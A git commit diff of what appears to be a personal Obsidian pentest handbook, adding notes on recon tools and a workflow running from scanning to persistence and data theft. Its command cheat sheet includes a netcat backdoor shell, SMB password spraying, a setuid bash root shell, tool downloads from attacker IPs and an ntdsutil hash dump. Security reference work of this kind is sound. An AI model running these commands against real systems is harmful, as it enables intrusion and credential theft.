vault backup: 2024-08-31 01:07:21

This commit is contained in:
Anton Nesterov 2024-08-31 01:07:22 +02:00
parent bc1a61ac7a
commit af9011411c
No known key found for this signature in database
GPG key ID: 59121E8AE2851FB5
397 changed files with 22558 additions and 62 deletions

BIN
.DS_Store vendored

Binary file not shown.

3
.obsidian/app.json vendored
View file

@ -1,3 +1,4 @@
{
"alwaysUpdateLinks": true
"alwaysUpdateLinks": true,
"promptDelete": false
}

View file

@ -17,6 +17,6 @@
"repelStrength": 10,
"linkStrength": 1,
"linkDistance": 250,
"scale": 1,
"scale": 0.7554462084221868,
"close": true
}

View file

@ -11,40 +11,11 @@
"id": "21b5784e2023f491",
"type": "leaf",
"state": {
"type": "markdown",
"state": {
"file": "01 - Planning.md",
"mode": "source",
"source": false
}
}
},
{
"id": "2a670ea5f942fc2d",
"type": "leaf",
"state": {
"type": "markdown",
"state": {
"file": "02 - Scoping.md",
"mode": "source",
"source": false
}
}
},
{
"id": "b310d53602dfbef1",
"type": "leaf",
"state": {
"type": "markdown",
"state": {
"file": "README.md",
"mode": "source",
"source": false
}
"type": "graph",
"state": {}
}
}
],
"currentTab": 2
]
}
],
"direction": "vertical"
@ -111,7 +82,6 @@
"state": {
"type": "backlink",
"state": {
"file": "README.md",
"collapseAll": false,
"extraContext": false,
"sortOrder": "alphabetical",
@ -128,7 +98,6 @@
"state": {
"type": "outgoing-link",
"state": {
"file": "README.md",
"linksCollapsed": false,
"unlinkedCollapsed": true
}
@ -150,9 +119,7 @@
"type": "leaf",
"state": {
"type": "outline",
"state": {
"file": "README.md"
}
"state": {}
}
}
]
@ -172,33 +139,46 @@
"command-palette:Open command palette": false
}
},
"active": "b310d53602dfbef1",
"active": "21b5784e2023f491",
"lastOpenFiles": [
"02 - Scoping.md",
"README.md",
"tools/OSINT TOOLS.md",
"templates/VULNERABILITY ASSESMENT REPORT.md",
"templates/PASTA.md",
"tools",
"tools/1.Information-Gathering/Global-Steps.md",
"01 - Planning.md",
"templates/RISK REGISTER.md",
"templates/PENTEST REPORT TEMPLATE.md",
"templates/INCIDENT REPORT TEMPLATE.md",
"templates/ASSET INVENTORY.md",
"templates/legal/Non-Disclosure Agreement.md",
"templates/legal/Request for Information (RFI).md",
"templates/legal/Statement of Work.md",
"02 - Scoping.md",
"Red Team/1 - Information Gathering/2 - Active Reconnaissance/• AMASS.md",
"Red Team/1 - Information Gathering/2 - Active Reconnaissance",
"Red Team/1 - Information Gathering",
"Red Team",
"tools/OSINT TOOLS.md",
"tools/2.Scanning-and-Enumeration/3.Ports/Ports-Links/20-and-21-FTP/FTP.md",
"tools/2.Scanning-and-Enumeration/2.Enumeration/Vulnerability/Nikto.md",
"tools/2.Scanning-and-Enumeration/2.Enumeration/Subdomain/Wayback Crawler.md",
"tools/2.Scanning-and-Enumeration/2.Enumeration/Subdomain/Google Dorking.md",
"tools/2.Scanning-and-Enumeration/2.Enumeration/Subdomain/Gobuster.md",
"tools/2.Scanning-and-Enumeration/2.Enumeration/Subdomain/AMASS.md",
"tools/2.Scanning-and-Enumeration/2.Enumeration/Directory/Gobuster.md",
"tools/2.Scanning-and-Enumeration/1.Scanner/Threader-3000.md",
"tools/2.Scanning-and-Enumeration/1.Scanner/Mass-Scan.md",
"tools/2.Scanning-and-Enumeration/1.Scanner/Nmap/More-Information.md",
"tools/2.Scanning-and-Enumeration/1.Scanner/Nmap/Commands.md",
"tools/1.Information-Gathering/2.Active-Reconnaissance/Whatweb.md",
"tools/1.Information-Gathering/2.Active-Reconnaissance/Traceroute.md",
"tools/1.Information-Gathering/2.Active-Reconnaissance/Telnet.md",
"tools/1.Information-Gathering/2.Active-Reconnaissance/Sn1per.md",
"tools/1.Information-Gathering/2.Active-Reconnaissance/Netcat.md",
"tools/1.Information-Gathering/2.Active-Reconnaissance/DNSenum.md",
"tools/1.Information-Gathering/2.Active-Reconnaissance/Curl.md",
"tools/1.Information-Gathering/2.Active-Reconnaissance/AMASS.md",
"tools/1.Information-Gathering/1.Passive-Reconnaissance/Whois.md",
"tools/5.Machine/3.Active-Directory/General/Exploitation/AV-Detection-and-Evasion/Evasion-Techniques/Tools",
"tools/5.Machine/1.Linux/General/Exploitation/AV-Detection-Evasion/Evasion-Techniques/Tools",
"tools/5.Machine/3.Active-Directory/General/Exploitation/AV-Detection-and-Evasion/Evasion-Techniques",
"tools/5.Machine/3.Active-Directory/General/Exploitation/AV-Detection-and-Evasion/Detection-Methods",
"tools/5.Machine/3.Active-Directory/General/Exploitation/5.Exploiting-AD/Specific-Topics",
"tools/5.Machine/1.Linux/General/Exploitation/AV-Detection-Evasion/Evasion-Techniques",
"tools/5.Machine/1.Linux/General/Exploitation/AV-Detection-Evasion/Detection-Methods",
"templates/Untitled Diagram.svg",
"templates/METHODOLOGY.svg",
"Pasted image 20240824205517.png",
"2024-08-24.md",
"templates/legal/DPA-en.odt",
"templates/legal/MSA-en.odt",
"templates/legal/NDA-en.odt",
"templates/legal/NDA.md",
"templates/legal",
"templates",
"().md",
"Welcome.md"
"Pasted image 20240824205517.png"
]
}

View file

@ -2,6 +2,7 @@
> This is a security handbook I complile for pentest and vulnerabilty analysis purposes.
> It is meant to be used with Obsidian.
## Progress
- Planning [100%]

BIN
tools/.DS_Store vendored Normal file

Binary file not shown.

View file

@ -0,0 +1,72 @@
## How to work through a vulnerable host
#### Scan for vulnerabilities
We're searching for vulnerabilities in the host, application, or information leakage.
- NMAP scanning
- vhost enumeration
- Gobuster
- Ping scanning
- Google Dorking
---
#### Determine Versions
After gathering information about the host and applications, we need to determine what versions they have.
- Banner grabbing
- netcat / telnet
- Shodan and Censys
- Inspect headers
- Throw intentional errors
---
#### Find Exploits
Find exploits for identified versions and software on host
- searchsploit
- exploit-db
- Google
- Shodan
---
#### Craft Payload
Create malicious payload through identified exploit. Allows further exploitation through reverse shells or other similar exploitation routes.
- msfvenom
- searchsploit
---
#### Execute Payload
Execute the payload we made, there can be some very interesting and creative ways to achieve this!
- Invoke-Command
- runas
- sudo
---
#### Establish Persistence
Ensure that our exploits will stay persistent on the host
- service takeovers
- cron jobs
- startup scripts
---
#### Escalate Privileges
Move from a foothold to root!
- get-process
- PowerUp.ps1
- LinEnum.sh
- LinPEAS
- WinPEAS
- suid/guid
- sudo -l
---
#### Exfiltrate Data
Steal the data on the host!
- Invoke-WebRequest
- iwr
- curl
- Imagination!!

View file

@ -0,0 +1,65 @@
# Linux
| Command | Purpose | | |
| -------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------- |
| `GREENIE=haha; export GREENIE` | Creates an environment variable named `GREENIE` with value `haha`, then exports it to be available to other programs | | |
| `PATH=$PATH:/root/haha` | Adds the folder `/root/haha` to the system `PATH` environment variable while retaining the previous `PATH` value | | |
| `sort | uniq -c | sort -n` | Takes `stdin`, sorts it, finds out the count of each unique value, then sorts by the count value in ascending order |
| `cat squid_access.log | sort -k 2 | head` | Reads `squid_access.log`, sorts it based on the second column, and displays the first 10 lines of the sorted output |
| `wc -l` | Counts the number of lines in a file or from `stdin` | | |
| `wc -c` | Counts the number of bytes in a file or from `stdin` | | |
| `wc -w` | Counts the number of words in a file or from `stdin` | | |
| `awk '{print $1,$4}'` | Prints the first and fourth (non-zero indexed) characters/fields from `stdin` | | |
| `awk '{print $(NF-1)}'` | Prints the second to last column from `stdin` | | |
| `awk '{print length, $1}'` | Prints the length of each line and the contents of the first field/column from `stdin` | | |
| `awk '{ sum += $1 } END { print sum }'` | Takes the lines from a file/`stdin` and adds up the values in the first field/column, acting as a quick and dirty calculator | | |
| `cat peptides.txt | while read line; do echo $line; done` | Reads in each line from `peptides.txt`, then performs `echo` for each line | |
| `cat users.txt | while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H 10.10.10.172; done` | Reads in each line from `users.txt`, then performs a password spraying attack on `10.10.10.172` using `smbmap` | |
| `for i in {1..5}; do echo $i; done` | Loops from 1 to 5 and displays the value of `i` for each iteration | | |
| `for i in {000..999}; do echo KEY-HAHA-$i; done` | Creates a list of all values from `KEY-HAHA-000` to `KEY-HAHA-999` and displays each value | | |
| `TF=$(mktemp -d)` | Creates a temporary directory and assigns its path to an environment variable named `TF` | | |
| `${#TF}` | Outputs the length of the value stored in the environment variable `TF` | | |
| `sed 's/12/13/g'` | Replaces all instances of `12` with `13` in stdin, will replace `1234` with `1334` | | |
| `sed -i.bak '/line to delete/d' | ` | Deletes a line of text for all files in a directory | |
| `xxd -p` | Prints the hex of stdin or a file only, without hexdump format | | |
| `xxd -r` | Interprets raw hex from stdin, can redirect to save the hex to a file | | |
| `tr -d '\r' | tr -d '\n' | xxd -r -p` | Takes hex input, removes newlines, and places it into a file |
| `find / -user Matt 2>/dev/null` | Finds all files owned by `Matt` on the box, redirects `stderr` to null | | |
| `find /etc -type f --name apache2. | ` | Finds any file which begins with `apache2. | ` in `/etc` |
| `grep -E "(25[0-5] | 2[0-4][0-9] | [01]?[0-9][0-9]?)\.(25[0-5] | 2[0-4][0-9] |
| `curl -d "param1=value&param2=value" https://example.com/resource.cgi` | Sends parameters with `curl` | | |
| `date -d @1286536308` | Converts an epoch timestamp to `date` output | | |
| `mknod backpipe p; /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe` | Creates a netcat backdoor without `-e` support | |
| `tar -zcvf files.tar.gz /var/log/apache2` | Creates a `files.tar.gz` archive of all files in `/var/log/apache2` | | |
| `prips 10.10.10.0/24` | Prints all IPs in a specific subnet | | |
| `ifconfig eth0 169.254.0.1 netmask 255.255.0.0 broadcast 169.254.255.255` | Assigns an IP address from the terminal | | |
| `ifconfig eth0 down; ifconfig eth0 hw ether 00:11:22:33:44:55; ifconfig eth0 up` | Changes the MAC address for interface `eth0` | | |
| `dhclient eth0` | Requests a DHCP address on interface `eth0` | | |
| `dd if=./input.file of=./outfile` | Makes a bit-by-bit copy of a file or system | | |
| `sudo ln -s /usr/bin/python3 /usr/bin/python` | Creates a symbolic link for Python to run Python 3 | | |
| `sudo mkdir /mnt/new` | Creates a new directory `/mnt/new` with `sudo` permissions | | |
| `mount /dev/sbd1 /mnt/new` | Mounts the file system located at `/dev/sbd1` to the directory `/mnt/new` | | |
| `umount /dev/sdb1` | Unmounts the file system located at `/dev/sdb1` | | |
| `sudo route add -net default gw 10.10.0.1 netmask 0.0.0.0 dev wlan0 metric 1` | Adds another default route with a higher metric to choose a different interface to access the Internet | | |
| `sudo dhclient wlan0` | Requests a new DHCP lease on interface `wlan0` | | |
| `openssl enc -aes-256-cbc -salt -in file.txt -out file.txt.enc` | Encrypts a file with a password at the command line | | |
| `openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt` | Decrypts a file using a password at the command line | | |
| `sudo chmod +s /bin/bash`<br>`bash -p` | Execute the command in a machine, and if root access is lost, use "bash -p" for a root shell. | | |
---
# Windows
| Command | Purpose |
| ------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------- |
| `get-childitem -hidden` | Shows all hidden files in the current directory |
| `gci -recurse C:\ | % { select-string -path $_ -pattern password} 2>$null` |
| `1..255 | % {ping -n1 192.168.0.$_ |
| `(New-Object System.Net.Webclient).DownloadFile("http://10.1.1.1:8000/nc.exe","C:\nc.exe")` | Downloads a file to the `C:\` location |
| `certutil -hashfile ntds.dit md5` | Hashes a file using MD5 |
| `certutil -encodehex ntds.dit ntds.hex` | Encodes a file as hexadecimal |
| `certutil -encode test.jpg test.base64` | Encodes a file as base64 |
| `certutil -decode test.base64 test.jpg` | Decodes a base64-encoded file |
| `iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1` | Downloads a file from another machine |
| `$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } }` | Monitors the clipboard and prints its contents to the screen |
| `ntdsutil; activate instance ntds; ifm; create full C:\ntds; quit; quit;` | Uses `ntdsutil` to obtain the `SYSTEM` registry and hive data as a backup, containing user hashes to crack |

View file

@ -0,0 +1,6 @@
## What is DNSdumper
DNSDumper is a websitetool that helps in enumerating DNS information about a domain. It is designed to gather all the DNS information related to a domain such as hostnames, IP addresses, DNS record types, and more.
## Website
For more information on crt.sh, including documentation and the latest updates, users can visit the project website: https://dnsdumpster.com/

View file

@ -0,0 +1,14 @@
## What is DIG?
Dig (Domain Information Groper) is a command-line tool for querying DNS (Domain Name System) servers. It is a powerful tool used for troubleshooting DNS-related problems and obtaining DNS-related information. It is an essential tool for network administrators, web developers, and anyone else who needs to understand how the DNS works.
## Common Uses and Commands
Here is the most common use of Dig and the command you can use:
```
dig DOMAIN.com
```
There are many more options and commands available for Dig, including reverse DNS lookups, querying for specific DNS records, and more. For more information, consult the Dig manual page by running the command `man dig` in your terminal.
## More Information
For more information about Dig, check out the official Dig documentation on the Internet Systems Consortium (ISC) website: https://linuxize.com/post/how-to-use-dig-command-to-query-dns-in-linux/

View file

@ -0,0 +1,17 @@
## What is Nslookup?
Nslookup is a command-line tool used to query the Domain Name System (DNS) to obtain domain name or IP address mapping or other DNS records. It is a utility available on most operating systems, including Windows, macOS, and Linux.
## Common uses and Commands
- **Lookup IP address of a domain**: To find the IP address of a domain, you can run the following command: `nslookup example.com`.
- **Reverse lookup**: You can perform a reverse lookup to find the domain name associated with an IP address. To do this, run the following command: `nslookup -type=PTR IP_address`
- **Specify a DNS server**: By default, nslookup uses the default DNS server configured on your system. You can specify a different DNS server to use by running the following command: `nslookup example.com DNS_server`
- **Query a specific DNS record type**: You can query for a specific type of DNS record, such as MX, SOA, or NS, by using the "-type" option. For example, to query for the MX record of a domain, run the following command: `nslookup -type=MX example.com`.
- More Options ---> A, AAAA, CNAME, MX, SQA, TXT
## More Information
More information and documentation for NSlookup: [Microsoft Docs](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/nslookup)

View file

@ -0,0 +1,13 @@
## what is crt.sh?
crt.sh is a web-based tool that allows users to search for SSL/TLS certificates that have been issued for a particular domain. It provides a simple and efficient way to view and analyze SSL/TLS certificates for a specific domain. The tool aggregates certificate transparency data from various Certificate Authorities (CAs) and displays them in an easy-to-read format.
## Website
```Terminal
- http://crt.sh/
```
For more information on the commands and options available, users can refer to the crt.sh documentation.
## More Information
For more information on crt.sh, including documentation and the latest updates, users can visit the project website: https://crt.sh

View file

@ -0,0 +1,78 @@
---
dg-publish: "True"
---
--- ---
<h2>What is Shodan</h2>
Shodan is a search engine for Internet-connected devices. It allows users to search for specific types of devices (e.g. webcams, routers, servers, etc.) connected to the Internet using a variety of filters. To use Shodan in command line in Linux, you can install the "shodan" command-line interface (CLI) tool. This tool can be installed using the pip package manager by running the command "pip install shodan". Once installed, you can use the "shodan" command to perform various tasks, such as searching for specific devices, downloading data, and more. To use the tool, you will need to have an API key, which can be obtained by creating an account on the Shodan website.
---
<h3>Common uses and Commands</h3>
The **shodan** CLI has a lot of commands, the most popular/ common ones are documented below. For the full list of commands just run the tool without any arguments:
Website ---> https://www.shodan.io/dashboard
<h3>Terminal Commands</h3>
- Count Number of Results
Returns the number of results for a search query.
- Example
```
$ shodan count microsoft iis 6.0
5310594
```
- Download Results
Search Shodan and download the results into a file where each line is a JSON banner. For more information on what the banner contains check out:
[Banner Specification](https://developer.shodan.io/api/banner-specification)
By default it will only download 1,000 results, if you want to download more look at the **--limit** flag.
The **download** command is what you should be using most often when getting results from Shodan since it lets you save the results and process them afterwards using the **parse** command. Because paging through results uses query credits, it makes sense to always store searches that you're doing so you won't need to use query credits for a search you already did in the past.
- Example
![](https://cli.shodan.io/img/download.png)
- Host
See information about the host such as where it's located, what ports are open and which organization owns the IP.
Example
```
$ shodan host 189.201.128.250
```
![](https://cli.shodan.io/img/host.png)
- Find you IP (Myip)
Returns your Internet-facing IP address.
- Example
```
$ shodan myip
199.30.49.210
```
- Parse
Use **parse** to analyze a file that was generated using the **download** command. It lets you filter out the fields that you're interested in, convert the JSON to a CSV and is friendly for pipe-ing to other scripts.
- Example
The following command outputs the IP address, port and organization in CSV format for the previously downloaded Microsoft-IIS data:
```
$ shodan parse --fields ip_str,port,org --separator , microsoft-data.json.gz
```
![](https://cli.shodan.io/img/parse.png)
- Search
This command lets you search Shodan and view the results in a terminal-friendly way. By default it will display the IP, port, hostnames and data. You can use the **--fields** parameter to print whichever banner fields you're interested in.
- Example
To search Microsoft IIS 6.0 and print out their IP, port, organization and hostnames use the following command:
```
$ shodan search --fields ip_str,port,org,hostnames microsoft iis 6.0
```
![](https://cli.shodan.io/img/search.png)

View file

@ -0,0 +1,17 @@
## what is ping?
Ping is a network diagnostic tool that sends packets of data to a target host and measures the time it takes for the packets to be transmitted and received. The tool is used to test the connectivity of a network and to determine the round-trip time (RTT) for data packets to travel between two devices.
## Common use and commands:
The most common use of ping is to test whether a host is reachable over the network. To use ping, simply open a command prompt or terminal and type "ping" followed by the target host's IP address or domain name. The tool will send a series of ICMP packets to the target host and report the results, including the RTT and any packet loss.
Ping
```Terminal
ping -c X IP
```
- -c ---> Number of ping sent
TTL response from the ping might give some infromation about the operating system
- Linux ---> 64 or less
- Windows ---> 128
- Cisco ---> 128 - 256

View file

@ -0,0 +1,20 @@
## What is Shodan
When you are tasked to run a penetration test against specific targets, as part of the passive reconnaissance phase, a service like [Shodan.io](https://www.shodan.io/) can be helpful to learn various pieces of information about the clients network, without actively connecting to it. Furthermore, on the defensive side, you can use different services from Shodan.io to learn about connected and exposed devices belonging to your organization.
Shodan.io tries to connect to every device reachable online to build a search engine of connected “things” in contrast with a search engine for web pages. Once it gets a response, it collects all the information related to the service and saves it in the database to make it searchable. Consider the saved record of one of tryhackme.coms servers.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/a8ac6c22a64b8413ee8d02c2224eddac.png)
This record shows a web server; however, as mentioned already, Shodan.io collects information related to any device it can find connected online. Searching for `tryhackme.com` on Shodan.io will display at least the record shown in the screenshot above. Via this Shodan.io search result, we can learn several things related to our search, such as:
- IP address
- hosting company
- geographic location
- server type and version
You may also try searching for the IP addresses you have obtained from DNS lookups. These are, of course, more subject to change. On their [help page](https://help.shodan.io/the-basics/search-query-fundamentals), you can learn about all the search options available at Shodan.io, and you are encouraged to join TryHackMes [Shodan.io](https://tryhackme.com/room/shodan).
## Website
```Terminal
- https://www.shodan.io
```

View file

@ -0,0 +1,20 @@
## what is WHOIS?
WHOIS is a network protocol used to query a database that contains information about domain name registrations and IP address assignments. The WHOIS database is maintained by various organizations, including Internet Service Providers (ISPs), domain name registrars, and regional Internet registries.
## Common use and commands:
The most common use of WHOIS is to obtain information about a particular domain name or IP address. To use WHOIS, simply enter the domain name or IP address in a WHOIS lookup tool, which will query the appropriate WHOIS server and return the relevant information.
WHOIS
```Terminal
whois DOMAIN_NAME
```
- Registrar ---> Via which registrar was the domain name registered?
- Contact ---> Name, organization, address, phone, among other things.
- Name Server ---> Which server to ask to resolve the domain name?
- Creation, update, and expiration dates
## More Information
For more information on WHOIS, including how to perform WHOIS lookups and advanced queries, users can refer to the tool's documentation or the website of a WHOIS lookup tool provider, such as ICANN (Internet Corporation for Assigned Names and Numbers) or WHOIS.net. Additionally, the source code for many WHOIS clients and servers is available on GitHub: [https://github.com/topics/whois](https://github.com/topics/whois).

View file

@ -0,0 +1,32 @@
## What is Amass?
Amass is a popular open-source tool used for reconnaissance and enumeration during security assessments. It is designed to discover and map external assets of an organization, including subdomains, IP addresses, and associated metadata.
The tool utilizes a combination of active and passive reconnaissance techniques, including DNS and zone transfers, web scraping, and web archive searching. It also integrates with various third-party data sources, such as Shodan, Censys, and VirusTotal, to enhance the accuracy and completeness of its findings.
Amass can be used to enumerate APIs, identify SSL/TLS certificates, perform DNS reconnaissance, map network routes, scrape web pages, search web archives, and obtain WHOIS information. It is commonly used by security professionals, bug bounty hunters, and penetration testers to gather information about their target organization and identify potential attack vectors.
## Common Use and Commands:
Amass is commonly used by security professionals, bug bounty hunters, and penetration testers to gather information about their target organization and identify potential attack vectors.
The following are some common commands used in Amass:
#### Subdomain Enumeration:
- Perform a DNS enumeration: `amass enum -d <domain>`
- To use passive DNS enumeration: `amass enum --passive -d <domain>`
- To use active DNS enumeration: `amass enum --active -d <domain>`
- To perform subdomain bruteforcing: `amass enum -d <domain> -brute`
#### Directory Enumeration:
- To brute-force directories and files: `amass enum -active -d <domain> -w <wordlist>`
- To brute-force directories with a defined extension: `amass enum -active -d <domain> -w <wordlist> -dirsearch /path/to/extensions`
- To find URLs with HTTP response code 200: `amass enum -active -d <domain> -w <wordlist> -status-code 200`
#### API Discovery:
- To discover APIs using passive techniques: `amass intel -d <domain> -api`
- To discover APIs using active techniques: `amass intel -d <domain> -api -active`
- To use a custom API key for Shodan: `amass intel -d <domain> -shodan-apikey <API-key>`
Amass supports various options and flags to customize the scan, such as setting the output format, configuring rate limits, and enabling verbose logging.
## More Information
For more information on Amass, including the latest updates and documentation, please visit the project's official Github repository: https://github.com/OWASP/Amass

View file

@ -0,0 +1,30 @@
## What is cURL?
cURL is a command-line tool and library for transferring data with URLs. It supports various protocols, including HTTP, HTTPS, FTP, and many others. cURL is widely used for interacting with web services, fetching web pages, and transferring files via different protocols.
## Common Use and Commands:
cURL's versatility makes it a valuable tool for developers, sysadmins, and security professionals. Here's how to use cURL, including the `-i` option to retrieve only the headers:
```Terminal
curl [OPTIONS] [URL]
```
Common options include:
- `-i`: Include the HTTP headers in the output.
- `-H`: Specify custom headers.
- `-X`: Specify the request method (e.g., GET, POST).
- `-L`: Follow redirects.
- `-o`: Write output to a file.
Example to retrieve only headers:
```Terminal
curl -i example.com
```
Output may include:
- HTTP headers such as status code, content type, and server information.
## More Information:
For further details on cURL and its advanced usage, users can consult the official documentation or visit the cURL website. Additionally, the source code for cURL is available on GitHub: [https://github.com/curl/curl](https://github.com/curl/curl).

View file

@ -0,0 +1,21 @@
## What is DNSenum?
DNSenum is a versatile DNS enumeration tool used primarily for information gathering during security assessments and penetration testing. It is written in Perl and provides capabilities for enumerating DNS information such as hostnames, subdomains, DNS records, and zone transfers. DNSenum automates the process of querying DNS servers to collect valuable intelligence about a target domain's infrastructure.
<h4>Common Use and Commands:</h4>
DNSenum is commonly used for:
- **DNS Enumeration**: Gathering information about a target domain's DNS infrastructure, including subdomains, hostnames, and associated IP addresses.
- **Zone Transfers**: Attempting zone transfers to retrieve all DNS records for a domain, which can reveal sensitive information about the target's network topology.
- **Brute-Force Enumeration**: Performing brute-force DNS enumeration to discover additional subdomains and hostnames.
The following are some common commands used with DNSenum:
```
dnsenum <domain> ---> To perform a basic DNS enumeration
dnsenum -f <domain> ---> For more advanced enumeration and zone transfer attempts
```
## More Information
For more information on DNSenum, including installation instructions, usage examples, and updates, please visit the project's official GitHub repository: [https://github.com/fwaeytens/dnsenum](https://github.com/fwaeytens/dnsenum)

View file

@ -0,0 +1,20 @@
## what is Netcat?
Netcat (often abbreviated as "nc") is a powerful networking tool that can be used to read and write data across network connections using TCP or UDP protocols. It is commonly used for troubleshooting network issues, as well as for performing network-related tasks such as port scanning, file transfers, and remote shell access.
## Common use and commands:
First, you can connect to a server, as you did with Telnet, to collect its banner using `nc 10.10.248.159 PORT`, which is quite similar to our previous `telnet 10.10.248.159 PORT`. Note that you might need to press SHIFT+ENTER after the GET line.
- Example
![[Screenshot_2022-09-01_22-27-07.png]]
In the terminal shown above, we used netcat to connect to 10.10.248.159 port 80 using `nc 10.10.248.159 80`. Next, we issued a get for the default page using `GET / HTTP/1.1`; we are specifying to the target server that our client supports HTTP version 1.1. Finally, we need to give a name to our host, so we added on a new line, `host: netcat`; you can name your host anything as this has no impact on this exercise.
Based on the output `Server: nginx/1.6.2` we received, we can tell that on port 80, we have Nginx version 1.6.2 listening for incoming connections.
Netcat
```Terminal
nc IP PORT
GET / HTTP/VERSION (check on website targeted what version they use)
host: netcat
```

View file

@ -0,0 +1,22 @@
## What is Sn1per?
Sn1per is a powerful penetration testing tool designed for security professionals and penetration testers. It is written in Python and Bash and provides a comprehensive suite of features for reconnaissance, scanning, enumeration, and exploitation. Sn1per automates various stages of the penetration testing process, making it efficient and effective for assessing the security posture of target systems.
## Common Use and Commands:
Sn1per is commonly used for:
- **Reconnaissance**: Gathering information about target systems, such as open ports, services, and vulnerabilities.
- **Scanning**: Conducting port scans, service enumeration, and vulnerability scanning using tools like Nmap and Nessus.
- **Enumeration**: Enumerating users, shares, and other resources on target networks.
- **Exploitation**: Exploiting discovered vulnerabilities to gain unauthorized access to systems.
The following are some common commands used with Sn1per:
```
./sn1per -t <target> ---> To initiate a basic scan
./sn1per -h ---> For more advanced scanning and enumeration
```
## More Information
For more information on Sn1per, including installation instructions, usage examples, and updates, please visit the project's official GitHub repository: [https://github.com/1N3/Sn1per](https://github.com/1N3/Sn1per)

View file

@ -0,0 +1,21 @@
## what is Telnet?
Telnet is a network protocol used to provide remote access to a device over a network connection. It allows a user to connect to and interact with a remote device as if they were physically present at the device's console. Telnet is commonly used for remote management of devices such as routers, switches, and servers.
## Common use and commands:
The most common use of Telnet is to establish a connection to a remote device's command-line interface (CLI). To do so, the user opens a Telnet client application and enters the IP address or hostname of the remote device. Once the connection is established, the user can enter commands as if they were sitting at the device's console.
However, the telnet client, with its simplicity, can be used for other purposes. Knowing that telnet client relies on the TCP protocol, you can use Telnet to connect to any service and grab its banner. Using `telnet MACHINE_IP PORT`, you can connect to any service running on TCP and even exchange a few messages unless it uses encryption.
- example
Lets say we want to discover more information about a web server, listening on port 80. We connect to the server at port 80, and then we communicate using the HTTP protocol. You dont need to dive into the HTTP protocol; you just need to issue `GET / HTTP/1.1`. To specify something other than the default index page, you can issue `GET /page.html HTTP/1.1`, which will request `page.html`. We also specified to the remote web server that we want to use HTTP version 1.1 for communication. To get a valid response, instead of an error, you need to input some value for the host `host: example` and hit enter twice. Executing these steps will provide the requested index page.
![[Screenshot_2022-09-01_22-13-27.png]]
Telnet
```Terminal
Telnet IP PORT
```
## More Information
For more information on Telnet, including how to configure Telnet clients and troubleshoot Telnet connections, users can refer to the tool's documentation or online resources such as TechTarget or Cisco's website. Additionally, the source code for many Telnet clients and servers is available on GitHub: [https://github.com/topics/telnet](https://github.com/topics/telnet).

View file

@ -0,0 +1,112 @@
## What is Traceroute?
Traceroute is a network diagnostic tool used to trace the path that an IP packet takes from the local device to a remote device over a network. It sends a sequence of packets to the remote device and records the time it takes for each packet to travel from one device to the next, providing information on the routing path and network latency.
## Common use and commands:
To use Traceroute, simply open a command prompt or terminal and type "traceroute" followed by the IP address or domain name of the remote device. The tool will send packets with increasing Time-To-Live (TTL) values and report the results, including the IP addresses of each device that handles the packets along the way and the round-trip time (RTT) for each packet.
Traceroute
```Terminal
traceroute IP
```
## How does Traceroute work?
The internet is made up of many, many different servers and end-points, all networked up to each other. This means that, in order to get to the content you actually want, you first need to go through a bunch of other servers. Traceroute allows you to see each of these connections -- it allows you to see every intermediate step between your computer and the resource that you requested. The basic syntax for traceroute on Linux is this: `traceroute <destination>`
By default, the Windows traceroute utility (`tracert`) operates using the same ICMP protocol that ping utilises, and the Unix equivalent operates over UDP. This can be altered with switches in both instances.
![Performing a traceroute to Google.com](https://muirlandoracle.co.uk/wp-content/uploads/2020/03/image-15.png)
You can see that it took 13 hops to get from my router (`_gateway`) to the Google server at 216.58.205.46
## More Information
For more information on Traceroute, including additional commands and options, users can refer to the tool's documentation or the GitHub repository: [https://github.com/iputils/iputils](https://github.com/iputils/iputils).
- More information
As the name suggests, the traceroute command _traces the route_ taken by the packets from your system to another host. The purpose of a traceroute is to find the IP addresses of the routers or hops that a packet traverses as it goes from your system to a target host. This command also reveals the number of routers between the two systems. It is helpful as it indicates the number of hops (routers) between your system and the target host. However, note that the route taken by the packets might change as many routers use dynamic routing protocols that adapt to network changes.
On Linux and macOS, the command to use is `traceroute MACHINE_IP`, and on MS Windows, it is `tracert MACHINE_IP`. `traceroute` tries to discover the routers across the path from your system to the target system.
There is no direct way to discover the path from your system to a target system. We rely on ICMP to “trick” the routers into revealing their IP addresses. We can accomplish this by using a small Time To Live (TTL) in the IP header field. Although the T in TTL stands for time, TTL indicates the maximum number of routers/hops that a packet can pass through before being dropped; TTL is not a maximum number of time units. When a router receives a packet, it decrements the TTL by one before passing it to the next router. The following figure shows that each time the IP packet passes through a router, its TTL value is decremented by 1. Initially, it leaves the system with a TTL value of 64; it reaches the target system with a TTL value of 60 after passing through 4 routers.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/e82c42dcfae78ac592a8d7843465d2d6.png)
However, if the TTL reaches 0, it will be dropped, and an ICMP Time-to-Live exceeded would be sent to the original sender. In the following figure, the system set TTL to 1 before sending it to the router. The first router on the path decrements the TTL by 1, resulting in a TTL of 0. Consequently, this router will discard the packet and send an ICMP time exceeded in-transit error message. Note that some routers are configured not to send such ICMP messages when discarding a packet.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/948388c823b156813fa30225c2fa3f05.png)
On Linux, `traceroute` will start by sending UDP datagrams within IP packets of TTL being 1. Thus, it causes the first router to encounter a TTL=0 and send an ICMP Time-to-Live exceeded back. Hence, a TTL of 1 will reveal the IP address of the first router to you. Then it will send another packet with TTL=2; this packet will be dropped at the second router. And so on. Lets try this on live systems.
In the following examples, we run the same command, `traceroute tryhackme.com` from TryHackMes AttackBox. We notice that different runs might lead to different routes taken by the packets.
Traceroute A
AttackBox Terminal - Traceroute A
```shell-session
user@AttackBox$ traceroute tryhackme.com
traceroute to tryhackme.com (172.67.69.208), 30 hops max, 60 byte packets
